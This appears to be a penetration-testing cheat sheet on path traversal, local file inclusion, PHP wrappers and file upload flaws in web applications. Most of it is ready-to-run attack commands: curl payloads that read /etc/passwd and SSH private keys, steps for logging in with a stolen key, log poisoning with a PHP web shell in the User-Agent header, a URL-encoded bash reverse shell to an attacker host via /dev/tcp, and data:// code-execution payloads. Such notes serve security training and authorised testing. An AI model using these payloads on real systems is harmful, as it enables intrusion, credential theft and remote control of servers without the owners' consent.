Path Traversal & File Inclusion
References:
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/OWASP/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md
Identifying Path Traversal
Look for URL parameters that reference files:
https://example.com/cms/login.php?language=en.html
Key observations:
login.phptells us the server uses PHPlanguage=en.htmlis a file reference we may be able to manipulate/cms/suggests the app runs in a subdirectory of the web root
Discovery Checklist
- Hover over all buttons and check URLs
- Check all links
- Navigate to all accessible pages
- Examine target source code for file references
Linux Path Traversal
Default web root: /var/www/html
Test with a known file:
curl http://$TARGET/index.php?page=../../../../../../../../../etc/passwd
Retrieve SSH keys:
curl http://$TARGET/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
If you get a private key, set permissions to 400 before using: chmod 400 stolen_key
ssh -i stolen_key -p 22 $USER@$TARGET
Windows Path Traversal
Test with a universally readable file:
curl http://$TARGET/index.php?page=C:\Windows\System32\drivers\etc\hosts
Read application logs:
curl http://$TARGET/index.php?page=C:\xampp\apache\logs\access.log
Local File Inclusion (LFI)
LFI takes path traversal further — if you can include a file that contains PHP code, the server will execute it.
Log Poisoning
If you can read the Apache access log via path traversal, inject PHP into the User-Agent header:
- Use Burp Repeater to send a request with a malicious User-Agent:
User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>
- Then trigger execution by including the log file with a command:
curl "http://$TARGET/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
- For a reverse shell (URL-encoded):
# Raw: bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1"
curl "http://$TARGET/index.php?page=../../../../var/log/apache2/access.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%22"
The bash -c wrapper ensures the code is executed using bash instead of the default sh shell, which may not support the redirect syntax.
PHP Wrappers
Reference: https://www.php.net/manual/en/wrappers.php
php://filter — Read Source Code
When including a PHP file directly shows incomplete output (because PHP executes it), use base64 encoding to extract the raw source:
curl "http://$TARGET/index.php?page=php://filter/convert.base64-encode/resource=admin.php"
Decode the output:
echo "<base64-output>" | base64 -d
data:// — Execute Code
Inject and execute PHP directly:
curl "http://$TARGET/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
With base64 encoding for complex payloads:
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
curl "http://$TARGET/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=id"
If a command has spaces, use URL encoding. %20 represents a space.
File Upload Vulnerabilities
Two categories:
- Direct execution — upload a file that the web server will execute (e.g., PHP script on a PHP-enabled server)
- Combined with another vuln — combine file upload with directory traversal to overwrite files like
authorized_keys, or combine with XXE/XSS